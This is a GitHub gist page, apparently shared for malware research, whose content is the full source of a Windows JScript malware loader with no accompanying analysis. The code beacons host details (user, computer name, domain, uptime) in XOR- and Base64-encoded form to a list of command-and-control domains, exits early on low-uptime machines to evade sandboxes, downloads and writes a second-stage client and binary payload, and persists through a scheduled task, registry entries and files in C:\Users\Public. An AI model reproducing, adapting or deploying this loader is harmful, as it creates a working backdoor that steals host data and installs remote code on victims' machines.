-
-
Save JohnHammond/f03d191d50c9e04cf154c27c6b4dd336 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
var config = { | |
PRIMARY_C2 : ['http://redirector.gvt1.com','http://onecs-live.azureedge.net','http://ipm-provider.ff.avast.com','http://tauhutxiga.com','http://monsuperentrepreneur.com','http://tangocation.com','http://e4a24fb0e.com','http://f78efaf43b.com'], | |
SOFT_SIG : 'mad24', | |
SOFT_VERSION: 30, | |
C2_REQUEST_SLEEP : 21, | |
C2_FAIL_SLEEP : 21, | |
C2_FAIL_COUNT : 20, | |
C2_OB_KEY : 'JxTRG4mY', | |
C2_PREFIX : 'rpc.aspx' | |
} | |
var SELECTED_C2 = config.PRIMARY_C2[0]; | |
Math.imul = function (a, b) { | |
var ah = (a >>> 16) & 0xffff; | |
var al = a & 0xffff; | |
var bh = (b >>> 16) & 0xffff; | |
var bl = b & 0xffff; | |
return ((al * bl) + (((ah * bl + al * bh) << 16) >>> 0) | 0); | |
}; | |
var GlobalStrings = { | |
REG_ROOT : "HKEY_CURRENT_USER\\Software\\ApplicationContainer\\Appsw64\\", | |
WMIC_EXEC_ARGS : "wmic process call create \"%path% %args%\"", | |
WMIC_EXEC : "wmic process call create \"%path%\"", | |
TASK_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Once /ST %time%", | |
TASK_LOOP_CREATE : "schtasks /Create /F /TN \"%name%\" /TR \"%command%\" /SC Minute /MO %timeout%", | |
NTFILE_PATH : "C:\\Users\\Public\\prnjobs.data", | |
ADS_SSID : "SyncSvc", | |
PERSIST_COMMAND : "explorer.exe C:\\Users\\Public\\explorer.js", | |
TASK_NAME : "PrintPool Service" | |
} | |
var ObjectProducer = {} | |
ObjectProducer.AccesibleObjects = { | |
MAIN_SH_OBJECT : 'WScript.Shell', | |
STREAM_ACCESS_OBJECT : 'ADODB.Stream', | |
XML_TREE_OBJECT : 'Microsoft.XMLDOM', | |
XML_TREE_V2_OBJECT : 'MSXml2.DOMDocument', | |
HTTP_CLIENT_OBJECT : 'MSXML2.XMLHTTP', | |
FS_DRIVE_OBJECT : 'Scripting.FileSystemObject' | |
}; | |
ObjectProducer.GetRootConstructor = function(){ | |
return ActiveXObject; | |
} | |
ObjectProducer.GetInstance = function(instanceKey){ | |
var rootConstructor = ObjectProducer.GetRootConstructor(); | |
return new rootConstructor(ObjectProducer.AccesibleObjects[instanceKey]); | |
} | |
var DataTools = {}; | |
DataTools.KEY_BASE = 1029; | |
DataTools.DeriveKey = function(keyStr){ | |
var keyBase = DataTools.KEY_BASE; | |
var key = 0; | |
for(var i = 0; i < keyStr.length; i++){ | |
keyBase = keyBase ^ keyStr.charCodeAt(i); | |
} | |
var _keyBase = keyBase.toString(); | |
for(var i = 0; i < _keyBase.length; i++){ | |
key += parseInt(_keyBase.charAt(i)); | |
} | |
return key; | |
} | |
DataTools.RotString = function(str, key){ | |
var rotd = ""; | |
for(var i = 0; i < str.length; i++){ | |
rotd = rotd.concat(String.fromCharCode((str.charCodeAt(i) ^ key))); | |
} | |
return rotd; | |
} | |
DataTools.Hash = function(str){ | |
for(var i = 0, h = 0xdeadbeef; i < str.length; i++) | |
h = Math.imul(h ^ str.charCodeAt(i), 2654435761); | |
return ((h ^ h >>> 16) >>> 0).toString(16); | |
} | |
DataTools.Random = {}; | |
DataTools.Random.Number = function(min, max){ | |
min = Math.ceil(min); | |
max = Math.floor(max); | |
return Math.floor(Math.random() * (max - min + 1)) + min; | |
} | |
DataTools.Random.String = function(len){ | |
var alphabet = "qwertyuiopasdfghjklzxcvbnm"; | |
var result = ""; | |
for(var i = 0; i < len; i++){ | |
var chr = DataTools.Random.Number(0, alphabet.length-1); | |
result = result.concat(alphabet.charAt(chr)); | |
} | |
return result; | |
} | |
DataTools.Strings = {}; | |
DataTools.Strings.ParseTemplate = function(str, templateStr){ | |
var template = templateStr.split('&'); | |
for(var i = 0; i < template.length; i++){ | |
var keyValue = template[i].split('='); | |
str = str.replace('%'.concat(keyValue[0]).concat('%'), keyValue[1]); | |
} | |
return str; | |
} | |
var Windows = {}; | |
Windows.CoMainObject = ObjectProducer.GetInstance('MAIN_SH_OBJECT'); | |
Windows.FsIoObject = ObjectProducer.GetInstance('FS_DRIVE_OBJECT'); | |
Windows.Execute = function(command){ | |
Windows.CoMainObject.Run(command); | |
} | |
Windows.GetEnv = function(env){ | |
return Windows.CoMainObject.ExpandEnvironmentStrings(env); | |
} | |
Windows.RegRead = function(path){ | |
return Windows.CoMainObject.RegRead(path); | |
} | |
Windows.RegWrite = function(entry, value){ | |
Windows.CoMainObject.RegWrite(GlobalStrings.REG_ROOT.concat(entry), value); | |
} | |
Windows.CreateFile = function(path){ | |
var fHandle = Windows.FsIoObject.CreateTextFile(path, 2, true); | |
fHandle.WriteLine(DataTools.Random.String(1024)); | |
fHandle.Close(); | |
} | |
Windows.AppendDataStream = function(path, stream, data){ | |
var fHandle = Windows.FsIoObject.CreateTextFile(path.concat(":").concat(stream), 2, true); | |
fHandle.WriteLine(data); | |
fHandle.Close(); | |
} | |
Windows.AppendDataStreamB = function(path, stream, data){ | |
data.SaveToFile(path.concat(":").concat(stream), 2); | |
data.Close(); | |
} | |
Windows.WriteData = function(path, data){ | |
var fHandle = Windows.FsIoObject.CreateTextFile(path, true); | |
fHandle.Write(data); | |
fHandle.Close(); | |
} | |
Windows.WriteBytes = function(path, data){ | |
data.SaveToFile(path, 2); | |
data.Close(); | |
} | |
Windows.WriteDataStreamBytes = function(path, stream, data){ | |
data.SaveToFile(path.concat(":").concat(stream), 2); | |
data.Close(); | |
} | |
Windows.ReadFile = function(path){ | |
var fHandle = Windows.FsIoObject.OpenTextFile(path, 1); | |
return fHandle.ReadAll(); | |
} | |
Windows.GetWMIProvider = function(pcname){ | |
return GetObject("winmgmts:"+ | |
"{impersonationLevel=impersonate}!\\\\" + pcname + "\\root\\cimv2"); | |
} | |
Windows.GetUptime = function(){ | |
var wmi = Windows.GetWMIProvider("."); | |
var queryResult = wmi.ExecQuery("select * from Win32_PerfFormattedData_PerfOS_System"); | |
var e = new Enumerator(queryResult); | |
return parseInt(e.item().SystemUpTime); | |
} | |
Windows.GetArch = function(){ | |
var architecture = "64"; | |
var product = Windows.RegRead("HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\ProductName"); | |
if(product.indexOf('Windows 7') != -1){ | |
architecture = "32"; | |
} | |
return architecture; | |
} | |
var Http = {}; | |
Http.Client = ObjectProducer.GetInstance('HTTP_CLIENT_OBJECT'); | |
Http.Request = function(url){ | |
try{ | |
Http.Client.Open('GET', url, false); | |
Http.Client.Send(); | |
if(Http.Client.Status == 200) | |
return Http.Client.ResponseText; | |
else | |
return ""; | |
}catch(e){ | |
return "" | |
} | |
} | |
var Loader = {}; | |
Loader.USERNAME = Windows.GetEnv("%username%"); | |
Loader.PCNAME = Windows.GetEnv("%COMPUTERNAME%"); | |
Loader.DOMAIN = Windows.GetEnv("%USERDOMAIN%"); | |
Loader.Uptime = Windows.GetUptime(); | |
Loader.MachineType = (Loader.PCNAME.toUpperCase() != Loader.DOMAIN.toUpperCase()).toString(); | |
Loader.GetUid = function(){ | |
return DataTools.Hash(Loader.USERNAME+Loader.PCNAME+Loader.DOMAIN+Loader.MachineType+config.SOFT_VERSION+config.SOFT_SIG) + config.SOFT_VERSION; | |
} | |
Loader.GetInitialRequest = function(nonce){ | |
var uid = Loader.GetUid(); | |
var request = [Loader.USERNAME, Loader.PCNAME, Loader.DOMAIN, Loader.MachineType, uid, config.SOFT_SIG, config.SOFT_VERSION, Loader.Uptime]; | |
var sessionKey = nonce + config.C2_OB_KEY; | |
request = request.join(":"); | |
request = DataTools.RotString(request, DataTools.DeriveKey(sessionKey)); | |
request = Base64Encode(request); | |
return encodeURIComponent(request); | |
} | |
Loader.GetInitialEndpoint = function(){ | |
var nonce = DataTools.Random.String(12) | |
var request = Loader.GetInitialRequest(nonce); | |
var endpoint = "/" + config.C2_PREFIX + "?ctl=KeepAlive®clid=" + request + "&forcedRedirect=" + DataTools.Random.String(12) + "&header=" + DataTools.Random.Number(1,10000) + "&ubwG=" + nonce; | |
return endpoint; | |
} | |
Loader.DeployHost = function(){ | |
var temp = Windows.GetEnv("%temp%"); | |
var architecture = Windows.GetArch(); | |
var nonce = DataTools.Random.String(12); | |
var uid = Loader.GetUid(); | |
var sessionKey = nonce + config.C2_OB_KEY; | |
var encodedId = DataTools.RotString(uid, DataTools.DeriveKey(sessionKey)); | |
encodedId = Base64Encode(encodedId); | |
encodedId = encodeURIComponent(encodedId); | |
var pluginHost = Http.Request(SELECTED_C2 + "/go.aspx?link=" + DataTools.Random.String(4) +"&goal=6E&r_ctplGuid=" + encodedId + "&TS2=" + nonce + "&rtag=" + architecture); | |
pluginHost = DataTools.RotString(pluginHost, DataTools.DeriveKey(uid.concat(config.C2_OB_KEY))); | |
var filename = uid.concat(".bin"); | |
Windows.WriteBytes(temp.concat("\\").concat(filename), Base64bytes(pluginHost)); | |
return temp.concat("\\").concat(filename); | |
} | |
Loader.DeployClient = function() { | |
if (Loader.Uptime <= 3000) { | |
WScript.Quit(0); | |
} | |
for (var i = 0; i < config.C2_FAIL_COUNT; i++) { | |
for (var j = 0; j < config.PRIMARY_C2.length; j++) { | |
try { | |
var response = Http.Request(config.PRIMARY_C2[j] + Loader.GetInitialEndpoint()); | |
response = DataTools.RotString(response, DataTools.DeriveKey(Loader.GetUid().concat(config.C2_OB_KEY))); | |
if (response.indexOf('<<<CLIENT__') !== -1) { | |
var client = response.replace('<<<CLIENT__', ''); | |
client = Base64text(client); | |
Windows.RegWrite("ShimV4", config.PRIMARY_C2[j]); | |
Windows.RegWrite("SetupServiceKey", Loader.GetUid()); | |
SELECTED_C2 = config.PRIMARY_C2[j]; | |
Loader.Persist(client); | |
return; | |
} | |
} catch (e) { | |
} | |
WScript.Sleep(config.C2_REQUEST_SLEEP * 1000); | |
} | |
} | |
} | |
Loader.Persist = function(client){ | |
var taskCommandTemplate = "name=".concat(GlobalStrings.TASK_NAME).concat("&command=").concat(GlobalStrings.PERSIST_COMMAND).concat("&timeout=6"); | |
var taskCommand = DataTools.Strings.ParseTemplate(GlobalStrings.TASK_LOOP_CREATE, taskCommandTemplate); | |
Windows.Execute(taskCommand); | |
Windows.RegWrite("ServerUrl", client); | |
Windows.RegWrite("WebLib32", Windows.ReadFile(WScript.ScriptFullName)); | |
Windows.CreateFile(GlobalStrings.NTFILE_PATH); | |
Windows.WriteData("C:\\Users\\Public\\explorer.js", client); | |
Loader.DeployHost(); | |
} | |
function debug(message){ | |
ObjectProducer.GetInstance('MAIN_SH_OBJECT').Popup(message); | |
} | |
function Base64text(string){ | |
var XmlDOM = new ActiveXObject("Microsoft.XMLDOM"); | |
var element = XmlDOM.createElement("tempContainer"); | |
element.dataType = "bin.Base64"; | |
element.text = string; | |
var stream = WScript.CreateObject("ADODB.Stream"); | |
stream.Type = 1; | |
stream.Open(); | |
stream.Write(element.nodeTypedValue); | |
stream.Position = 0; | |
stream.Type = 2; | |
stream.CharSet = "utf-8"; | |
return stream.ReadText(); | |
} | |
function StringToBinary(string){ | |
var BinaryStream = new ActiveXObject("ADODB.Stream"); | |
BinaryStream.Type = 2; | |
BinaryStream.CharSet = "ascii"; | |
BinaryStream.Open(); | |
BinaryStream.WriteText(string); | |
BinaryStream.Position = 0; | |
BinaryStream.Type = 1; | |
BinaryStream.Position = 0; | |
return BinaryStream.Read(); | |
} | |
function Base64bytes(string){ | |
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument"); | |
var element = XmlDOM.createElement("Base64Data"); | |
element.dataType = "bin.base64"; | |
element.text = string; | |
var stream = WScript.CreateObject("ADODB.Stream"); | |
stream.Type = 1; | |
stream.Open(); | |
stream.Write(element.nodeTypedValue); | |
return stream; | |
} | |
function Base64Encode(string) { | |
var XmlDOM = WScript.CreateObject("MSXml2.DOMDocument"); | |
var element = XmlDOM.createElement("Base64Data"); | |
element.dataType = "bin.base64"; | |
element.nodeTypedValue = StringToBinary(string); | |
return element.text.replace(/\n/g, "").replace(/\/\//g, ""); | |
} | |
if(typeof(CLIENT_IMPORT_ENV) == typeof(undefined)){ | |
Loader.DeployClient(); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment